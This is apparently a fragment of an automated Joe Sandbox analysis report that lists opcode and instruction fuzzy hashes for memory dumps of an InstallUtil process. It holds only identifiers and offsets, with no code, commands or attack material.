                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_f80000_InstallUtil.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a59c80d9ae4164112f697bd4aa0dff037f2c203082aa67ef074e033284764fde
                                                                                                              • Instruction ID: 5b793f6ee767a41d9491c75aec11043939462fba09c49167b02440a11c6e6dd1
                                                                                                              • Opcode Fuzzy Hash: a59c80d9ae4164112f697bd4aa0dff037f2c203082aa67ef074e033284764fde
                                                                                                              • Instruction Fuzzy Hash: 13C19F74E10218CFDB14DFA5C994B9DBBB2BF89300F6081A9D409AB3A5DB359E85CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2544272662.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_f80000_InstallUtil.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6b3b762d301309c50498a331fed32373b5e29461d28eccaa4e391c4a056f9ef0
                                                                                                              • Instruction ID: 761f8493fe7f87026058f58cfe9eea34e4bf43a828bb913090a5131866182c43
                                                                                                              • Opcode Fuzzy Hash: 6b3b762d301309c50498a331fed32373b5e29461d28eccaa4e391c4a056f9ef0
                                                                                                              • Instruction Fuzzy Hash: 6EC1AF74E00218CFEB18DFA5C944B9DBBB2BF89300F2481A9D409AB3A5DB355E85DF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2551935406.0000000005620000.00000040.00000800.00020000.00000000.sdmp, Offset: 05620000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_5620000_InstallUtil.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 32dde9003afacaa0f52e0d397f58eb17f0ec197713deae787eb643764a44e648
                                                                                                              • Instruction ID: 39ccd1162c3212145059d7e51a5fdb31597636246ce3091287bb3c71a671a3e4
                                                                                                              • Opcode Fuzzy Hash: 32dde9003afacaa0f52e0d397f58eb17f0ec197713deae787eb643764a44e648
                                                                                                              • Instruction Fuzzy Hash: 56D19E78E00218CFEB14DFA5D954B9DBBB2BF89300F2081A9D409AB365EB355D82CF15
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2551935406.0000000005620000.00000040.00000800.00020000.00000000.sdmp, Offset: 05620000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_5620000_InstallUtil.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c0ec1bfc2aa05894f0f357026c43c69450ffcb754d7f5a8b148c69b52986c492
                                                                                                              • Instruction ID: 8ba1ecdaff6139362a769bfd6233c4275bf17ad7758000095492c7298fcd260e
                                                                                                              • Opcode Fuzzy Hash: c0ec1bfc2aa05894f0f357026c43c69450ffcb754d7f5a8b148c69b52986c492
                                                                                                              • Instruction Fuzzy Hash: AEC19F74E00218CFDB14DFA5C984B9DBBB2BF89300F6081A9D409AB3A5DB355E81CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2551935406.0000000005620000.00000040.00000800.00020000.00000000.sdmp, Offset: 05620000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_5620000_InstallUtil.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ff7ccf2ae2249c489f13c8345a785fe2ddc56009d99f9536ca5e68bc51436d0d
                                                                                                              • Instruction ID: 17496810df3054bd074f000c844fa3190ea0c2f8b43fea979307a3833242c5a4
                                                                                                              • Opcode Fuzzy Hash: ff7ccf2ae2249c489f13c8345a785fe2ddc56009d99f9536ca5e68bc51436d0d
                                                                                                              • Instruction Fuzzy Hash: 93C19F74E00218CFDB54DFA5C994BADBBB2BF89300F2081A9D409AB3A5DB355E85CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2551935406.0000000005620000.00000040.00000800.00020000.00000000.sdmp, Offset: 05620000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_5620000_InstallUtil.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 59aa8925fae4847fd3d981b3e5a3c9e7d170356bc083f04cfa4c5e9e1045a44e
                                                                                                              • Instruction ID: 4baa4c18fa858f642ce5dddad8eeb5a29d4f22ef0c7e127778e0d7ba10cf9e86
                                                                                                              • Opcode Fuzzy Hash: 59aa8925fae4847fd3d981b3e5a3c9e7d170356bc083f04cfa4c5e9e1045a44e
                                                                                                              • Instruction Fuzzy Hash: 4FC19E74E00218CFDB14DFA5C984B9DBBB2BF89300F2081A9D409AB3A5DB359E85CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2551935406.0000000005620000.00000040.00000800.00020000.00000000.sdmp, Offset: 05620000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_5620000_InstallUtil.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ef6b7e8e789e0526db1dd501d2d5a5b4cde0a52e6986baa273b75df89b19162a
                                                                                                              • Instruction ID: 12eab3522c24c93eb94ab9ae9c0d54ca2449d51f8d4e05b05ab9b918c8175639
                                                                                                              • Opcode Fuzzy Hash: ef6b7e8e789e0526db1dd501d2d5a5b4cde0a52e6986baa273b75df89b19162a
                                                                                                              • Instruction Fuzzy Hash: A1C19F74E00218CFDB14DFA5C984B9DBBB2BF89300F6481A9D409AB3A5DB359A81CF50
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2544272662.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_f80000_InstallUtil.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Xq$Xq$Xq$Xq
                                                                                                              • API String ID: 0-3965792415
                                                                                                              • Opcode ID: 86101ab836d986bcf8367a1b9abe8d1eabb6449389549c8726d5001d26a5649c
                                                                                                              • Instruction ID: 895fb406c1ff0a9f3db7a5cf9c6dced8a3725dc984acc93b5d7c8268a90ed6e4
                                                                                                              • Opcode Fuzzy Hash: 86101ab836d986bcf8367a1b9abe8d1eabb6449389549c8726d5001d26a5649c
                                                                                                              • Instruction Fuzzy Hash: 1A318F71D012298BDFA5EBA888417EFB7B2BF94310F144079C405A7351EB74DE85EB92